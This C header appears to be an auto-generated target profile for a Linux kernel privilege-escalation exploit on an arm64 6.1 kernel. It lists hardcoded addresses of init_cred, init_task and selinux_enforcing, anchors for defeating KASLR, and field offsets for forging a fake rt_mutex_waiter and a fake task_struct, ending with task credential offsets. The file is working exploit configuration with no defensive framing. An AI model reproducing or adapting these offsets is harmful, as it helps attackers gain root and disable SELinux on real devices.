/* Generated by generate_target.py; do not copy offsets by hand. */
#ifndef TARGET_H
#define TARGET_H

/* target profile */
#define KIMAGE_TEXT_BASE 0xffffffc008000000ULL
#define P0_PAGE_OFFSET 0xffffff8080000000ULL
#define P0_PHYS_OFFSET 0x80000000ULL
#define P0_KERNEL_PHYS_LOAD 0xa8000000ULL
#define PSELECT_WAITER_WORD_SHIFT 3

/* kernel image addresses */
#define INIT_TASK 0xffffffc009fef600ULL
#define INIT_CRED 0xffffffc00a001a68ULL
#define ENTRY_TASK 0xffffffc009fac318ULL
#define PER_CPU_OFFSET 0xffffffc009fdb650ULL
#define ROOT_TASK_GROUP 0xffffffc00a1d7580ULL
#define SELINUX_ENFORCING 0xffffffc00a2293d0ULL

/* KASLR anchors */
#define SLIDE_NFULNL_LOGGER_IMAGE 0xffffffc009fe29c8ULL
#define SLIDE_LOGGERS_0_1_IMAGE 0xffffffc009fe2918ULL
#define SLIDE_RANDOM_BOOT_ID_DATA_IMAGE 0xffffffc00a107448ULL
#define SLIDE_INIT_TASK_IMAGE 0xffffffc009fef600ULL
#define SLIDE_ROOT_TASK_GROUP_IMAGE 0xffffffc00a1d7580ULL

/* waiter and fake task fields */
#define WAITER_TREE_ENTRY_OFF 0x0
#define WAITER_PI_TREE_ENTRY_OFF 0x18
#define WAITER_TASK_OFF 0x30
#define WAITER_LOCK_OFF 0x38
#define WAITER_WAKE_STATE_OFF 0x40
#define WAITER_PRIO_OFF 0x44
#define WAITER_DEADLINE_OFF 0x48
#define WAITER_WW_CTX_OFF 0x50

/* 6.1 legacy rt_mutex_waiter: 无 rt_waiter_node 子结构, */
/* slide/fops/util 用 #ifdef SLIDE_RT_MUTEX_WAITER_LEGACY 切换 6.1 word 布局 */
#define SLIDE_RT_MUTEX_WAITER_LEGACY 1
#define FAKE_WAITER_TREE_PRIO_OFF 0  /* 6.1 legacy: 不存在, util.c 用 #ifdef 跳过 (原 0x44) */
#define FAKE_WAITER_TREE_DEADLINE_OFF 0  /* 6.1 legacy: 不存在, util.c 用 #ifdef 跳过 (原 0x48) */
#define FAKE_WAITER_PI_TREE_ENTRY_OFF 0x18
#define FAKE_WAITER_PI_TREE_PRIO_OFF 0  /* 6.1 legacy: 不存在, util.c 用 #ifdef 跳过 (原 0x5c) */
#define FAKE_WAITER_PI_TREE_DEADLINE_OFF 0  /* 6.1 legacy: 不存在, util.c 用 #ifdef 跳过 (原 0x60) */
#define FAKE_WAITER_TASK_OFF 0x30
#define FAKE_WAITER_LOCK_OFF 0x38
#define FAKE_WAITER_WAKE_STATE_OFF 0x40
#define FAKE_WAITER_WW_CTX_OFF 0x50
#define FAKE_TASK_USAGE_OFF 0x40
#define FAKE_TASK_PRIO_OFF 0x84
#define FAKE_TASK_NORMAL_PRIO_OFF 0x8c
#define FAKE_TASK_TASK_GROUP_OFF 0x348
#define FAKE_TASK_PI_LOCK_OFF 0x924
#define FAKE_TASK_PI_WAITERS_OFF 0x938
#define FAKE_TASK_PI_TOP_TASK_OFF 0x948
#define FAKE_TASK_PI_BLOCKED_ON_OFF 0x950
#define FAKE_TASK_UCLAMP_REQ_OFF 0x350
#define FAKE_TASK_UCLAMP_OFF 0x358

/* task credential pointers */
#define TASK_REAL_CRED_OFF 0x830
#define TASK_CRED_OFF 0x838

#endif
